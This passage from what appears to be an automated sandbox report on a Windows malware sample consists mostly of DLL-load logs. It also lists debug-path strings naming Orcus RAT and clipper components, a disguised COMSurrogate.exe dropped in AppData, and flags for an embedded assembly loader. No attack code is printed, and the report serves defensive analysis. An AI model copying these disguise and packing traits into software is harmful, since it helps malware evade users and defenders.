                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: DM6vAAgoCw.exeStatic file information: File size 7284070 > 1048576
                                  Source: DM6vAAgoCw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Source: Binary string: q$costura.orcus.staticcommands.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: costura.shelllibrary.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdb source: RegAsm.exe, 00000016.00000002.4642907007.00000000061D0000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared\obj\Release\Orcus.Shared.pdb@q source: RegAsm.exe, 00000016.00000002.4626770103.0000000005130000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdbL source: RegAsm.exe, 00000016.00000002.4642907007.00000000061D0000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed source: smartscreen.exe, 00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000016.00000000.3684956628.00000000003E2000.00000002.00000001.01000000.0000000A.sdmp
                                  Source: Binary string: costura.directoryinfoex.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Tools\CLIPPER\obj\Release\net461\win-x64\CLIPPER.pdbSHA256 source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb source: RegAsm.exe, 00000016.00000002.4570721077.0000000002A50000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: q&costura.orcus.shared.utilities.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000016.00000000.3684956628.00000000003E2000.00000002.00000001.01000000.0000000A.sdmp
                                  Source: Binary string: costura.orcus.shared.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdb source: RegAsm.exe, 00000016.00000002.4641407014.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: C:\Users\zack3r\Desktop\Orcus.Plugins.ADE\Orcus.Plugins.BsodProtection-master\Source\obj\Debug\BsodProtection.pdb source: RegAsm.exe, 00000016.00000002.4641342536.0000000005A80000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.opuswrapper.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdbH0 source: RegAsm.exe, 00000016.00000002.4641407014.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Tools\CLIPPER\obj\Release\net461\win-x64\CLIPPER.pdb source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: q'costura.fluentcommandlineparser.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared.Utilities\obj\Release\Orcus.Shared.Utilities.pdb source: RegAsm.exe, 00000016.00000002.4640471488.0000000005A40000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared\obj\Release\Orcus.Shared.pdb source: RegAsm.exe, 00000016.00000002.4626770103.0000000005130000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: C:\Users\zack3r\Desktop\Orcus.Plugins.ADE\Orcus.Plugins.BsodProtection-master\Source\obj\Debug\BsodProtection.pdb8*R* D*_CorDllMainmscoree.dll source: RegAsm.exe, 00000016.00000002.4641342536.0000000005A80000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.orcus.plugins.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp

                                  Data Obfuscation

                                  barindex
                                  .NET source code contains potential unpacker
                                  Source: smartscreen.exe.22.dr, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                                  Source: COMSurrogate.exe.38.dr, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                                  Suspicious powershell command line found
